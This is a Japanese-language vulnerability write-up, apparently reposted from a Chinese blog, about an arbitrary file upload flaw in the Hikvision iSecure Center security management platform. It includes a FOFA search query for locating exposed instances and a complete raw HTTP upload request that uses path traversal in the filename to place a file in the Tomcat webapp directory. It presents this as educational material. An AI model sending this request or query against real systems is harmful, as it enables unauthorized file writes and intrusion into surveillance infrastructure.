Hikvision isecure center 総合セキュリティ管理プラットフォームに任意のファイルがアップロードされる脆弱性

情報 2023-08-11 21:36:06 訪問数: null

Hikvision isecure center 総合セキュリティ管理プラットフォームに任意のファイルがアップロードされる脆弱性

免責事項:

この記事に記載されている関連技術を違法なテストに使用しないでください。この記事で提供される情報やツールの普及と使用によって引き起こされる直接的または間接的な結果と損失は、ユーザー自身が負担するものとします。記事の著者は無関係です。この記事は教育のみを目的としています。

1. Hikvision isecure center 統合セキュリティ管理プラットフォームの概要

HIKVISION iSecure Center 総合セキュリティ管理プラットフォームは、ビデオ監視、オールインワン カード、駐車場、警報検出、その他のシステム機器にアクセスしてエッジ ノード データを取得し、セキュリティを実現する「統合」および「インテリジェント」プラットフォームのセットです。情報統合 電子地図との連携により、各システムの機能を統合し、リッチなインテリジェントアプリケーションを実現します。HIKVISION iSecure Center プラットフォームは、「統合ソフトウェア技術アーキテクチャ」という先進的なコンセプトに基づいて設計されており、ビジネス面でのプラットフォームの弾力的な拡張に対応するためのビジネスコンポーネント技術を採用しています。同プラットフォームは、業界全体の総合セキュリティビジネス全般に適用可能で、各システムのリソースを統合・一元管理し、統一導入、統一構成、統一管理、統一スケジューリングを実現する。

2. 脆弱性の説明

HIKVISION iSecure Center 総合セキュリティ管理プラットフォームは、ビデオ監視、オールインワン カード、駐車場、警報検出、その他のシステム機器にアクセスしてエッジ ノード データを取得し、セキュリティを実現する「統合」および「インテリジェント」プラットフォームのセットです。情報統合 電子地図との連携により、各システムの機能を統合し、リッチなインテリジェントアプリケーションを実現します。HIKVISION iSecure Center プラットフォームは、「統合ソフトウェア技術アーキテクチャ」という先進的なコンセプトに基づいて設計されており、ビジネス面でのプラットフォームの弾力的な拡張に対応するためのビジネスコンポーネント技術を採用しています。同プラットフォームは、業界全体の総合セキュリティビジネス全般に適用可能で、各システムのリソースを統合・一元管理し、統一導入、統一構成、統一管理、統一スケジューリングを実現する。Hikvision isecure center 総合セキュリティ管理プラットフォームに任意のファイルがアップロードされる脆弱性がある

CVE编号:
CNNVD编号:
CNVD编号:

3、衝撃バージョン

HIKVISION iSecure Center 統合セキュリティ管理プラットフォーム

ここに画像の説明を挿入

4、fofaクエリステートメント

app=“HIKVISION-iSecure-Center”

5. 脆弱性の再発

脆弱性リンク: https://127.0.0.1/clusterMgr/836424300.txt;.js 脆弱性データ パッケージ:

POST /center/api/files;.js HTTP/1.1
Host: 127.0.0.1
User-Agent: python-requests/2.26.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 257
Content-Type: multipart/form-data; boundary=ea26cdac4990498b32d7a95ce5a5135c

--ea26cdac4990498b32d7a95ce5a5135c
Content-Disposition: form-data; name="file"; filename="../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/153107606.txt"
Content-Type: application/octet-stream

332299402
--ea26cdac4990498b32d7a95ce5a5135c--

ここに画像の説明を挿入

アップロードされたファイルは /clusterMgr/153107606.txt;.js にあります。 153107606 を、上記のデータ パッケージでアップロードしたファイル名に変更します。正常にアップロードされました

6.POC&EXP

使用法: python3 .\vuln31.py https://127.0.0.1/ / で終わることを忘れないでください。

ここに画像の説明を挿入

ここに画像の説明を挿入

7. 是正に関する意見

解決策を見つけるには、製造元に問い合わせてください: https://www.hikvision.com/cn/

おすすめ

転載: blog.csdn.net/holyxp/article/details/131498469
おすすめ
ランキング
--- ELオプションを搭載するテンプレートを指定するオプションをレンダリング別テンプレート/使用を指定するためのオプションを使用して、インラインテンプレート/テンプレートの使用を指定するために、テンプレート/テンプレートオプションを使用してテンプレートを指定します
0216leetcodeはPythonで5つの質問をブラシします
ショック!七つの子どもたちは魂を拷問しました!暴露子どもたちはインサイダーを振っプログラム!
ターゲット属性タグをhtmlの
Linuxビルドnacosスタンドアロンバージョンとクラスター
Cálculo experimental da renda simulada de investimento fixo do fundo
Kali Linux は VMware ツールをインストールします (vmtools ボタンは灰色です)
程序员洞察报告:90后占比过半 搜索算法等岗位人才短缺
【Java基礎シリーズチュートリアル】第17章 Javaアノテーション
Javaでの空白を入力できないようにユーザー
アーカイブ
もっと
2024-05-09(30)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)
2024-05-02(0)
2024-05-01(4)
2024-04-30(35)

コードワールド

© 2018 codetd.com